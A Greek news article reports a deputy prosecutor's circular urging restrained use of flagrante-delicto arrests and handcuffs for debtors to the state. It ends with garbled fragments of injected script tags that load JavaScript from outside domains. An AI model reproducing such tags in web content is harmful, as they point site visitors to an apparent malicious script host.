Χειροπέδες με… τακτ για τους οφειλέτες του Δημοσίου

Χειροπέδες με το... σταγονόμετρο για τους οφειλέτες του Δημοσίου

Συλλήψεις στο πλαίσιο του αυτοφώρου αλλά και «χειροπέδες» με μέτρο και σύνεση ζήτησε ο αντιεισαγγελέας του Αρείου Πάγου και αρμόδιος για την πάταξη του οικονομικού εγκλήματος, Νίκος Παντελής.

Συγκεκριμένα, σε εγκύκλιο στην οποία αποστέλλει προς τους Εισαγγελείς Εφετών και Πρωτοδικών και στην ΕΛ.ΑΣ., αναφέρει πως οι συλλήψεις με τη διαδικασία του αυτοφώρου πρέπει να γίνονται με γνώμονα την προστασία της προσωπικής ελευθερίας.

Μεταξύ άλλων αναφέρει πως οι Αστυνομικές Αρχές θα πρέπει να χρησιμοποιούν χειροπέδες σε συλληφθέντες για οφειλές προς το Δημόσιο όταν εκείνοι αντιστέκονται ή είναι ύποπτοι φυγής.

Ωστόσο, υπογραμμίζει πως η εφαρμογή της αυτόφωρης διαδικασίας πρέπει να γίνεται εφόσον υπάρχει σοβαρός λόγος που την επιβάλλει. Μάλιστα, δεν παραλείπει να αναφέρει ότι σύμφωνα με τις υπάρχουσες διατάξεις τα αρμόδια αστυνομικά όργανα πρέπει να συμπεριφέρονται με κάθε δυνατή ευγένεια και κατά τη σύλληψη να χρησιμοποιούν βία μόνο εάν υπάρχει ανάγκη. Σκοπός είναι, όπως σημειώνει, να αποφεύγουν φράσεις που βλάπτουν την τιμή και την υπόληψη του συλληφθέντος.

Στο μεταξύ, ο κ. Παντελής υπενθυμίζει στην εγκύκλιό του πως οι οφειλέτες του δημοσίου ειδοποιούνται συχνά από τις διωκτικές Αρχές για τις φορολογικές τους εκκρεμότητες και τους παρέχεται προθεσμία τακτοποίησης.

Για όσους βρίσκονται σε αδυναμία πληρωμής ή οι υποθέσεις τους δε μπορούν να ρυθμιστούν είναι σαφές ότι εκλείπουν οι προϋποθέσεις που επιβάλλουν αλλά και δικαιολογούν τη δέσμευση τους με χειροπέδες.

Ο αντιεισαγγελέας του Αρείου Πάγου υπογραμμίζει ότι στο πλαίσιο της προανάκρισης με εισαγγελική παραγγελία, οι εισαγγελείς οφείλουν να ελέγχουν πότε δικαιολογείται η χρήση χειροπέδων.

Ο εισαγγελικός λειτουργός τονίζει ότι για λελογισμένη χρήση της αυτόφωρης διαδικασίας σε περιπτώσεις ακραίας και προκλητικής φοροδιαφυγής και αναφέρει ότι η αυτόφωρη διαδικασία και καταδίκη στα συγκεκριμένα αδικήματα δεν αποτελεί αυτοσκοπό αλλά μέσο για την επίτευξη των δημοσιονομικών στόχων της πολιτείας.

Από την τριετή εφαρμογή του 3943/2011 προκύπτει πως στις περισσότερες περιπτώσεις της μη καταβολής βεβαιωμένων χρεών επέρχεται ανάκληση των παραγγελιών αυτόφωρης διαδικασίας.

Οι ειδοποιούμενοι για τις οικονομικές εκκρεμότητες, σύμφωνα με όσα τονίζει, σπεύδουν υπό την απειλή της σύλληψης να τακτοποιήσουν την οφειλή.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >